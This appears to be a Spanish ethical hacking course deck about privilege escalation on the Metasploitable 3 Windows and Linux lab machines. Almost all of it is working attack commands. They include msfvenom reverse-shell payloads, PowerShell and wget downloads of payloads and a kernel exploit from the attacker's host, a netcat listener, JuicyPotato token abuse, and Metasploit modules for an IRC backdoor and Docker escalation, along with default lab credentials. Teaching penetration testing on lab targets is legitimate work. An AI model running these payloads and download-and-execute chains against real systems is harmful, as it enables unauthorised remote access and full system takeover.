Está en la página 1de 20

Curso Ethical

Hacking
Elevación de privilegios
Metasploitable 3 -
Windows
Explotación puerto: 8585

wpscan --url http://x.x.x.x:8585/wordpress -e u

firefox: http://x.x.x.x:8585/wordpress

logearse con credenciales: vagrant:vagrant

Ir al menú: Appearance > Editor y editar el archivo header.php.

msfvenom –p php/meterpreter_reverse_tcp LHOST=<IP_LOCAL> LPORT=<PUERTO_LOCAL> –f raw > shell.php


Objetos DCOM

DCOM es una construcción de programación que permite a un ordenador


ejecutar programas a través de la red en otro ordenador como si el programa
se ejecutara localmente. DCOM es un acrónimo de Distributed Component
Object Model. DCOM es un componente de software propietario de Microsoft
que permite a los objetos COM comunicarse entre sí a través de la red.
¿Por qué es necesario DCOM?

DCOM no ganó la batalla para convertirse en el protocolo estándar de Internet, pero


sigue integrado en el sistema operativo Windows y es la forma en que se comunican
muchos servicios de Windows, como la consola de administración de Microsoft (MMC).

Dado que DCOM puede ejecutar programas en otros ordenadores, los hackers pueden
aprovecharlo para realizar ataques de movimiento lateral a través de su red, obteniendo
acceso a más datos. Esta actividad puede ser difícil de detectar porque no se trata de
malware ni de herramientas de hackers: todo lo que se necesita para acceder a DCOM es
PowerShell.
Explotación puerto: 8585

wpscan --url http://x.x.x.x:8585/wordpress -e u

firefox: http://x.x.x.x:8585/wordpress

logearse con credenciales: vagrant:vagrant

Ir al menú: Appearance > Editor y editar el archivo header.php.

msfvenom –p php/meterpreter_reverse_tcp LHOST=<IP_LOCAL> LPORT=<PUERTO_LOCAL> –f raw > shell.php


JuicyPotato

Elevación de privilegios mediante la


manipulación de Tokens en cuentas de servicio.
Explotación:

Kali:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip_kali> LPORT=4444 -f exe -o reverse.exe

sudo python -m http.server 80


Explotación:

Windows:
powershell.exe -c "iwr -uri http://1<ip_kali>/reverse.exe -outfile reverse.exe"
powershell.exe -c "iwr -uri http://<ip_kali>/JuicyPotato.exe -outfile JuicyPotato.exe"
Explotación:

Kali:
nc -nlvp 4444
Explotación:

Windows:
JuicyPotato.exe -t * -p C:\wamp\www\wordpress\rev.exe -l 1337
Metasploitable 3 - Linux
Explotación Kernel :

ssh chewbacca@192.168.126.133 #Password: rwaaaaawr8


uname -a
searchsploit "Linux Kernel 3.13"

https://www.exploit-db.com/exploits/37292
/usr/share/exploitdb/exploits/linux/local/37292.c
Explotación Kernel :

Kali:

sudo python3 -m http.server 80

Metasploitable:

wget http://<ip_kali>/37292

mv 37292 37292.c

gcc 37292.c -o root

. /root
Explotación puerto: 6697

exploit/unix/irc/unreal_ircd_3281_backdoor
Explotación Docker :

shell to meterpreter
Explotación Docker :

linux/local/docker_daemon_privilege_escalation
Explotación Docker :

set payload linux/x86/meterpreter/reverse_tcp


Explotación Docker :

linux/local/docker_daemon_privilege_escalation

También podría gustarte